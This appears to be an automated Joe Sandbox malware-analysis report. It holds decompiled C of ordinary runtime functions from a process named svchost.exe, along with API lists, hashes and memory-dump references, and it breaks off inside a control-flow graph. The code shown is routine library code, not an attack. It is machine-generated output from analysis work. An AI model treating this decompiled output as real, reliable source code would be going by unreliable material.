                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                            • String ID:
                            • API String ID: 2652629310-0
                            • Opcode ID: 141b9859d7be71f55c451d729b0c3dac7df6d9fd0f49340d7b746489b3d636af
                            • Instruction ID: 16b1440edb65b3e5e68e8f899df920dc3b13b6251efc60322de6fd70cbe0a72b
                            • Opcode Fuzzy Hash: 141b9859d7be71f55c451d729b0c3dac7df6d9fd0f49340d7b746489b3d636af
                            • Instruction Fuzzy Hash: F431E172A1020AABDF25DF65DC81EAEBBE5EB44311F0441AAFC04EB250EB35CD55CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BCCDB3, Relevance: 6.1, APIs: 4, Instructions: 65timeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00BCCDB3(struct _FILETIME _a4, intOrPtr _a8, signed int _a12, void* _a16) {
				signed int _v8;
				struct _SYSTEMTIME _v24;
				struct _SYSTEMTIME _v40;
				signed int _v44;
				signed int _t20;
				signed int _t26;
				signed int _t27;
				signed int _t43;
				signed int _t46;

				_t20 =  *0xbec008; // 0xdc55bb75
				_v8 = _t20 ^ _t46;
				if(_a4.dwLowDateTime != 0 || _a8 != 0) {
					if(FileTimeToSystemTime( &_a4,  &_v40) == 0 || SystemTimeToTzSpecificLocalTime(0,  &_v40,  &_v24) == 0) {
						_t26 = E00BCC998(GetLastError());
						goto L8;
					} else {
						_v44 = _v44 | 0xffffffff;
						_t27 = E00BCCE5D( &_v24,  &(_v24.wMonth),  &(_v24.wDay),  &(_v24.wHour),  &(_v24.wMinute),  &(_v24.wSecond),  &_v44);
						if((_t27 & _t43) == 0xffffffff) {
							_t26 = E00BCC9CE();
							 *_t26 = 0x84;
							L8:
							_t27 = _t26 | 0xffffffff;
						}
					}
				} else {
					_t27 = _a12;
				}
				E00BC786A();
				return _t27;
			}












                            0x00bccdbb
                            0x00bccdc2
                            0x00bccdc9
                            0x00bccde9
                            0x00bcce44
                            0x00000000
                            0x00bccdff
                            0x00bccdff
                            0x00bcce1f
                            0x00bcce2e
                            0x00bcce30
                            0x00bcce35
                            0x00bcce4a
                            0x00bcce4a
                            0x00bcce4d
                            0x00bcce2e
                            0x00bccdd1
                            0x00bccdd1
                            0x00bccdd4
                            0x00bcce54
                            0x00bcce5c

                            APIs
                            • FileTimeToSystemTime.KERNEL32(00000000,?,?,?,00000000,00000000,000000FF,?,?,00000000), ref: 00BCCDE1
                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00BCCDF5
                            • GetLastError.KERNEL32 ref: 00BCCE3D
                            • __dosmaperr.LIBCMT ref: 00BCCE44
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: Time$System$ErrorFileLastLocalSpecific__dosmaperr
                            • String ID:
                            • API String ID: 593088924-0
                            • Opcode ID: f54be86c729cadeda82c0f5de60323b3e2fea15e0f44ca57e7542794b1418b2a
                            • Instruction ID: 4a551bcde6aa1bf4fc9a2c113122b7f96ba56e21cc61711b6179efebfa9cc4a0
                            • Opcode Fuzzy Hash: f54be86c729cadeda82c0f5de60323b3e2fea15e0f44ca57e7542794b1418b2a
                            • Instruction Fuzzy Hash: 59212E7290010DABCB01DFE4C985FDE7BFCEB19320F1046AAE51AD7180EB74EA449B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BCFD60, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                            Download Yara Rule
                            C-Code - Quality: 83%
                            			E00BCFD60(signed int __eax, void* __ecx, void* __edx) {
				signed int _t2;
				signed int _t3;
				int _t10;
				int _t11;
				void* _t13;
				void* _t16;
				short** _t17;
				char* _t20;
				void* _t21;

				_t16 = __edx;
				_t13 = __ecx;
				_t17 =  *0xbf60c0; // 0xe19000
				if(_t17 != 0) {
					_t10 = 0;
					while( *_t17 != _t10) {
						_t2 = WideCharToMultiByte(_t10, _t10,  *_t17, 0xffffffff, _t10, _t10, _t10, _t10);
						_t11 = _t2;
						if(_t11 == 0) {
							L11:
							_t3 = _t2 | 0xffffffff;
						} else {
							_t20 = E00BD0B10(_t13, _t11, 1);
							_pop(_t13);
							if(_t20 == 0) {
								L10:
								_t2 = E00BD09EB(_t20);
								goto L11;
							} else {
								_t10 = 0;
								if(WideCharToMultiByte(0, 0,  *_t17, 0xffffffff, _t20, _t11, 0, 0) == 0) {
									goto L10;
								} else {
									_push(0);
									_push(_t20);
									E00BD6882(_t16);
									E00BD09EB(0);
									_t21 = _t21 + 0xc;
									_t17 =  &(_t17[1]);
									continue;
								}
							}
						}
						L9:
						return _t3;
						goto L12;
					}
					_t3 = 0;
					goto L9;
				} else {
					return __eax | 0xffffffff;
				}
				L12:
			}












                            0x00bcfd60
                            0x00bcfd60
                            0x00bcfd63
                            0x00bcfd6b
                            0x00bcfd74
                            0x00bcfdc9
                            0x00bcfd82
                            0x00bcfd88
                            0x00bcfd8c
                            0x00bcfdda
                            0x00bcfdda
                            0x00bcfd8e
                            0x00bcfd96
                            0x00bcfd99
                            0x00bcfd9c
                            0x00bcfdd3
                            0x00bcfdd4
                            0x00000000
                            0x00bcfd9e
                            0x00bcfda8
                            0x00bcfdb4
                            0x00000000
                            0x00bcfdb6
                            0x00bcfdb6
                            0x00bcfdb7
                            0x00bcfdb8
                            0x00bcfdbe
                            0x00bcfdc3
                            0x00bcfdc6
                            0x00000000
                            0x00bcfdc6
                            0x00bcfdb4
                            0x00bcfd9c
                            0x00bcfdcf
                            0x00bcfdd2
                            0x00000000
                            0x00bcfdd2
                            0x00bcfdcd
                            0x00000000
                            0x00bcfd6d
                            0x00bcfd71
                            0x00bcfd71
                            0x00000000

                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4112b8b385c0efe93e0ef88f3bed21e884952941f3919d8b368548fec413c467
                            • Instruction ID: b4730f9bc0fce8f0e59af90b5c2d0b0e9d6bd255e4d76e49db292e07446bd84c
                            • Opcode Fuzzy Hash: 4112b8b385c0efe93e0ef88f3bed21e884952941f3919d8b368548fec413c467
                            • Instruction Fuzzy Hash: E1014FB22196167EE62026787CC1F7B678EDB517B8B3003FAB522562D6EE608D404170
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BCFDDF, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                            Download Yara Rule
                            C-Code - Quality: 82%
                            			E00BCFDDF(signed int __eax, void* __ecx) {
				signed int _t2;
				signed int _t3;
				int _t10;
				int _t11;
				void* _t13;
				char** _t16;
				short* _t19;
				void* _t20;

				_t13 = __ecx;
				_t16 =  *0xbf60bc; // 0xe016f8
				if(_t16 != 0) {
					_t10 = 0;
					while( *_t16 != _t10) {
						_t2 = MultiByteToWideChar(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10);
						_t11 = _t2;
						if(_t11 == 0) {
							L11:
							_t3 = _t2 | 0xffffffff;
						} else {
							_t19 = E00BD0B10(_t13, _t11, 2);
							_pop(_t13);
							if(_t19 == 0) {
								L10:
								_t2 = E00BD09EB(_t19);
								goto L11;
							} else {
								_t10 = 0;
								if(MultiByteToWideChar(0, 0,  *_t16, 0xffffffff, _t19, _t11) == 0) {
									goto L10;
								} else {
									_push(0);
									_push(_t19);
									E00BD688D(_t13);
									E00BD09EB(0);
									_t20 = _t20 + 0xc;
									_t16 =  &(_t16[1]);
									continue;
								}
							}
						}
						L9:
						return _t3;
						goto L12;
					}
					_t3 = 0;
					goto L9;
				} else {
					return __eax | 0xffffffff;
				}
				L12:
			}











                            0x00bcfddf
                            0x00bcfde2
                            0x00bcfdea
                            0x00bcfdf3
                            0x00bcfe42
                            0x00bcfdff
                            0x00bcfe05
                            0x00bcfe09
                            0x00bcfe53
                            0x00bcfe53
                            0x00bcfe0b
                            0x00bcfe13
                            0x00bcfe16
                            0x00bcfe19
                            0x00bcfe4c
                            0x00bcfe4d
                            0x00000000
                            0x00bcfe1b
                            0x00bcfe21
                            0x00bcfe2d
                            0x00000000
                            0x00bcfe2f
                            0x00bcfe2f
                            0x00bcfe30
                            0x00bcfe31
                            0x00bcfe37
                            0x00bcfe3c
                            0x00bcfe3f
                            0x00000000
                            0x00bcfe3f
                            0x00bcfe2d
                            0x00bcfe19
                            0x00bcfe48
                            0x00bcfe4b
                            0x00000000
                            0x00bcfe4b
                            0x00bcfe46
                            0x00000000
                            0x00bcfdec
                            0x00bcfdf0
                            0x00bcfdf0
                            0x00000000

                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 42481826ff54556150f7c498a9549e5e6c2a2596191a049dc4f824a047f0429d
                            • Instruction ID: 76001e29df8b619b49f29c451b7c4ad83695d9afa8330a9e941d145cd708ac9e
                            • Opcode Fuzzy Hash: 42481826ff54556150f7c498a9549e5e6c2a2596191a049dc4f824a047f0429d
                            • Instruction Fuzzy Hash: F20162B261921B7FA6112AB87CC1F7B6B9EDB5177873107FEB521922E7EE608D004160
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC90D6, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00BC90D6() {
				void* _t4;
				void* _t8;

				E00BC95F4();
				E00BC9588();
				if(E00BC92E8() != 0) {
					_t4 = E00BC929A(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00BC9324();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                            0x00bc90d6
                            0x00bc90db
                            0x00bc90e7
                            0x00bc90ec
                            0x00bc90f1
                            0x00bc90f3
                            0x00bc90fe
                            0x00bc90f5
                            0x00bc90f5
                            0x00000000
                            0x00bc90f5
                            0x00bc90e9
                            0x00bc90e9
                            0x00bc90eb
                            0x00bc90eb

                            APIs
                            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00BC90D6
                            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00BC90DB
                            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00BC90E0
                              • Part of subcall function 00BC92E8: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00BC92F9
                            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00BC90F5
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                            • String ID:
                            • API String ID: 1761009282-0
                            • Opcode ID: e28c8e4002e4feb3b2185dbbe633f88e05227d084f504df5a77bd89c2bb576a4
                            • Instruction ID: 76da824d50cd6e6abd7294b6a2d22ff83fb1d0fad9f1d953e4eea3a2205714e5
                            • Opcode Fuzzy Hash: e28c8e4002e4feb3b2185dbbe633f88e05227d084f504df5a77bd89c2bb576a4
                            • Instruction Fuzzy Hash: 10C04894000B11A43E213AB0229FFED33C08DF33C6BC0A4CDE8E09B0438E07044A613B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BCD646, Relevance: 5.1, APIs: 4, Instructions: 139COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00BCD646(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
				char* _v8;
				int _v12;
				char _v16;
				char _v24;
				char _v28;
				void* __ebx;
				char _t34;
				int _t35;
				int _t38;
				long _t39;
				char* _t42;
				int _t44;
				int _t47;
				int _t53;
				intOrPtr _t55;
				void* _t56;
				char* _t57;
				char* _t62;
				char* _t63;
				void* _t64;
				int _t65;
				short* _t67;
				short* _t68;
				int _t69;
				intOrPtr* _t70;

				_t64 = __edx;
				_t53 = _a12;
				_t67 = _a4;
				_t68 = 0;
				if(_t67 == 0) {
					L3:
					if(_a8 != _t68) {
						E00BCAFAE(_t53,  &_v28, _t64, _a16);
						_t34 = _v24;
						__eflags = _t67;
						if(_t67 == 0) {
							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
								_t69 = _t68 | 0xffffffff;
								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
								__eflags = _t35;
								if(_t35 != 0) {
									L29:
									_t28 = _t35 - 1; // -1
									_t69 = _t28;
									L30:
									__eflags = _v16;
									if(_v16 != 0) {
										_t55 = _v28;
										_t31 = _t55 + 0x350;
										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
										__eflags =  *_t31;
									}
									return _t69;
								}
								 *((intOrPtr*)(E00BCC9CE())) = 0x2a;
								goto L30;
							}
							_t70 = _a8;
							_t56 = _t70 + 1;
							do {
								_t38 =  *_t70;
								_t70 = _t70 + 1;
								__eflags = _t38;
							} while (_t38 != 0);
							_t69 = _t70 - _t56;
							goto L30;
						}
						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
							_t69 = _t68 | 0xffffffff;
							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
							__eflags = _t35;
							if(_t35 != 0) {
								goto L29;
							}
							_t39 = GetLastError();
							__eflags = _t39 - 0x7a;
							if(_t39 != 0x7a) {
								L21:
								 *((intOrPtr*)(E00BCC9CE())) = 0x2a;
								 *_t67 = 0;
								goto L30;
							}
							_t42 = _a8;
							_t57 = _t42;
							_v8 = _t57;
							_t65 = _t53;
							__eflags = _t53;
							if(_t53 == 0) {
								L20:
								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
								__eflags = _t44;
								if(_t44 != 0) {
									_t69 = _t44;
									goto L30;
								}
								goto L21;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								_t45 =  *_t57;
								_v12 = _t65 - 1;
								__eflags =  *_t57;
								if(__eflags == 0) {
									break;
								}
								_t47 = E00BD5F84(__eflags, _t45 & 0x000000ff,  &_v24);
								_t62 = _v8;
								__eflags = _t47;
								if(_t47 == 0) {
									L18:
									_t65 = _v12;
									_t57 = _t62 + 1;
									_v8 = _t57;
									__eflags = _t65;
									if(_t65 != 0) {
										continue;
									}
									break;
								}
								_t62 = _t62 + 1;
								__eflags =  *_t62;
								if( *_t62 == 0) {
									goto L21;
								}
								goto L18;
							}
							_t42 = _a8;
							goto L20;
						}
						__eflags = _t53;
						if(_t53 == 0) {
							goto L30;
						}
						_t63 = _a8;
						while(1) {
							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
							__eflags =  *(_t68 + _t63);
							if( *(_t68 + _t63) == 0) {
								goto L30;
							}
							_t68 =  &(_t68[0]);
							_t67 =  &(_t67[1]);
							__eflags = _t68 - _t53;
							if(_t68 < _t53) {
								continue;
							}
							goto L30;
						}
						goto L30;
					}
					 *((intOrPtr*)(E00BCC9CE())) = 0x16;
					return E00BD1788() | 0xffffffff;
				}
				if(_t53 != 0) {
					 *_t67 = 0;
					goto L3;
				}
				return 0;
			}




























                            0x00bcd646
                            0x00bcd64f
                            0x00bcd654
                            0x00bcd657
                            0x00bcd65b
                            0x00bcd66a
                            0x00bcd66d
                            0x00bcd68d
                            0x00bcd692
                            0x00bcd695
                            0x00bcd697
                            0x00bcd765
                            0x00bcd76b
                            0x00bcd780
                            0x00bcd78c
                            0x00bcd792
                            0x00bcd794
                            0x00bcd7a3
                            0x00bcd7a3
                            0x00bcd7a3
                            0x00bcd7a6
                            0x00bcd7a6
                            0x00bcd7aa
                            0x00bcd7ac
                            0x00bcd7af
                            0x00bcd7af
                            0x00bcd7af
                            0x00bcd7af
                            0x00000000
                            0x00bcd7b6
                            0x00bcd79b
                            0x00000000
                            0x00bcd79b
                            0x00bcd76d
                            0x00bcd770
                            0x00bcd773
                            0x00bcd773
                            0x00bcd775
                            0x00bcd776
                            0x00bcd776
                            0x00bcd77a
                            0x00000000
                            0x00bcd77a
                            0x00bcd69d
                            0x00bcd6a3
                            0x00bcd6d0
                            0x00bcd6dc
                            0x00bcd6e2
                            0x00bcd6e4
                            0x00000000
                            0x00000000
                            0x00bcd6ea
                            0x00bcd6f0
                            0x00bcd6f3
                            0x00bcd74f
                            0x00bcd754
                            0x00bcd75c
                            0x00000000
                            0x00bcd75c
                            0x00bcd6f5
                            0x00bcd6f8
                            0x00bcd6fa
                            0x00bcd6fd
                            0x00bcd6ff
                            0x00bcd701
                            0x00bcd737
                            0x00bcd745
                            0x00bcd74b
                            0x00bcd74d
                            0x00bcd761
                            0x00000000
                            0x00bcd761
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bcd703
                            0x00bcd703
                            0x00bcd703
                            0x00bcd706
                            0x00bcd709
                            0x00bcd70b
                            0x00000000
                            0x00000000
                            0x00bcd715
                            0x00bcd71c
                            0x00bcd71f
                            0x00bcd721
                            0x00bcd729
                            0x00bcd729
                            0x00bcd72c
                            0x00bcd72d
                            0x00bcd730
                            0x00bcd732
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bcd732
                            0x00bcd723
                            0x00bcd724
                            0x00bcd727
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bcd727
                            0x00bcd734
                            0x00000000
                            0x00bcd734
                            0x00bcd6a5
                            0x00bcd6a7
                            0x00000000
                            0x00000000
                            0x00bcd6ad
                            0x00bcd6b0
                            0x00bcd6b4
                            0x00bcd6b7
                            0x00bcd6bb
                            0x00000000
                            0x00000000
                            0x00bcd6c1
                            0x00bcd6c2
                            0x00bcd6c5
                            0x00bcd6c7
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bcd6c9
                            0x00000000
                            0x00bcd6b0
                            0x00bcd674
                            0x00000000
                            0x00bcd67f
                            0x00bcd661
                            0x00bcd667
                            0x00000000
                            0x00bcd667
                            0x00bcd7be

                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,?,?,?), ref: 00BCD6DC
                            • GetLastError.KERNEL32 ref: 00BCD6EA
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 00BCD745
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast
                            • String ID:
                            • API String ID: 1717984340-0
                            • Opcode ID: 7aa40cc8d2e38a34afb5c4997f686f97fca70e9123cd3c9adc0e87cfd894ecc9
                            • Instruction ID: a4923514212d478449dbf58d3967fd374813b1facbe30fee6991012fd171e15a
                            • Opcode Fuzzy Hash: 7aa40cc8d2e38a34afb5c4997f686f97fca70e9123cd3c9adc0e87cfd894ecc9
                            • Instruction Fuzzy Hash: 5941C539600246AFDB229F64C884FAABBE5EF41310F2541FEF8599B1A1EB708D01CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Analysis Process: svchost.exe PID: 3108 Parent PID: 6308 svchost.exeCOMMON

                            Executed Functions

                            Function 00BD0158, Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00BD0158(int _a4) {
				void* _t14;

				if(E00BD3A8A(_t14) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00BD01DD(_t14, _a4);
				ExitProcess(_a4);
			}




                            0x00bd0164
                            0x00bd0180
                            0x00bd0180
                            0x00bd0189
                            0x00bd0192

                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,00BD012E,?,00BEA6E0,0000000C,00BD0285,?,00000002,00000000), ref: 00BD0179
                            • TerminateProcess.KERNEL32(00000000,?,00BD012E,?,00BEA6E0,0000000C,00BD0285,?,00000002,00000000), ref: 00BD0180
                            • ExitProcess.KERNEL32 ref: 00BD0192
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: 0028a958ab6ba8e6bf7cab1c297951fda38d626cb413f0eaeabacc26406dfd57
                            • Instruction ID: f7df19ccea1d28d888b565b5530267ccda10905c876d93edc68efbf7a8416528
                            • Opcode Fuzzy Hash: 0028a958ab6ba8e6bf7cab1c297951fda38d626cb413f0eaeabacc26406dfd57
                            • Instruction Fuzzy Hash: 4CE04631420188BFCF117F90CD48B497BA9FB00781F000059F808AB222EB75DE82CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB8450, Relevance: 424.2, APIs: 150, Strings: 92, Instructions: 712COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 6dab8450-6dab8476 PyModule_Create2 1 6dab8478-6dab847b 0->1 2 6dab847c-6dab848f PyModule_GetDict 0->2 3 6dab8491-6dab8495 2->3 4 6dab8496-6dab8501 PyLong_FromLong PyDict_SetItemString ?PyWinGlobals_Ensure@@YAHXZ PyDict_SetItemString PyEval_InitThreads ?PyWinLong_FromVoidPtr@@YAPAU_object@@PBX@Z PyDict_SetItemString * 2 PyType_Ready 2->4 5 6dab8b93-6dab8b9b 4->5 6 6dab8507-6dab8514 PyType_Ready 4->6 6->5 7 6dab851a-6dab8527 PyType_Ready 6->7 7->5 8 6dab852d-6dab8565 PyDict_New * 3 PyDict_SetItemString 7->8 9 6dab856b 8->9 10 6dab8722-6dab8740 GetModuleHandleW 8->10 11 6dab8570-6dab8579 9->11 12 6dab874f-6dab87a5 GetProcAddress * 7 10->12 13 6dab8742-6dab874d LoadLibraryW 10->13 15 6dab8580-6dab8584 11->15 14 6dab87aa-6dab87b5 GetModuleHandleW 12->14 13->12 13->14 16 6dab87b7-6dab87c2 LoadLibraryW 14->16 17 6dab87c4-6dab8834 GetProcAddress * 9 14->17 18 6dab85a0-6dab85a2 15->18 19 6dab8586-6dab8588 15->19 16->17 20 6dab8839-6dab8844 GetModuleHandleW 16->20 17->20 21 6dab85a5-6dab85a7 18->21 22 6dab858a-6dab8590 19->22 23 6dab859c-6dab859e 19->23 27 6dab8853-6dab8875 GetProcAddress * 3 20->27 28 6dab8846-6dab8851 LoadLibraryW 20->28 25 6dab870f 21->25 26 6dab85ad-6dab85b2 21->26 22->18 24 6dab8592-6dab859a 22->24 23->21 24->15 24->23 31 6dab8716-6dab871c 25->31 29 6dab85b4-6dab85b8 26->29 30 6dab887a-6dab8b92 PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString PyLong_FromLong PyDict_SetItemString 27->30 28->27 28->30 32 6dab85ba-6dab85bc 29->32 33 6dab85d4-6dab85d6 29->33 31->10 31->11 34 6dab85be-6dab85c4 32->34 35 6dab85d0-6dab85d2 32->35 36 6dab85d9-6dab85db 33->36 34->33 37 6dab85c6-6dab85ce 34->37 35->36 36->25 38 6dab85e1-6dab85e6 36->38 37->29 37->35 39 6dab85e8-6dab85ec 38->39 40 6dab8608-6dab860a 39->40 41 6dab85ee-6dab85f0 39->41 42 6dab860d-6dab860f 40->42 43 6dab85f2-6dab85f8 41->43 44 6dab8604-6dab8606 41->44 42->25 46 6dab8615-6dab861c 42->46 43->40 45 6dab85fa-6dab8602 43->45 44->42 45->39 45->44 47 6dab8620-6dab8624 46->47 48 6dab8640-6dab8642 47->48 49 6dab8626-6dab8628 47->49 52 